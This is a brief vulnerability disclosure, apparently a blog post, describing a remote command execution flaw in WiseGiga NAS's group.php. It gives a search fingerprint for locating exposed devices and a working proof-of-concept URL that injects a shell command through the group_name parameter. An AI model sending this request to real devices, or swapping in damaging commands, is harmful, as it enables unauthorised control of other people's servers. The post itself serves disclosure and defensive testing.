Wisegiga Nas Group Php Remote Command Execution Vulnerability
Wisegiga Nas Group Php Remote Command Execution Vulnerability
WiseGiga NAS group.php remote command execution vulnerability
Vulnerability Description
WiseGiga NAS group.php file has a remote command execution vulnerability. Attackers can obtain server permissions by sending specific request packets.
Vulnerability Impact
WiseGiga NAS
Network surveying and mapping
app=”WISEGIGA-NAS”
Vulnerability reappears
Main page
Verify POC
1
/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt
This post is licensed under CC BY 4.0 by the author.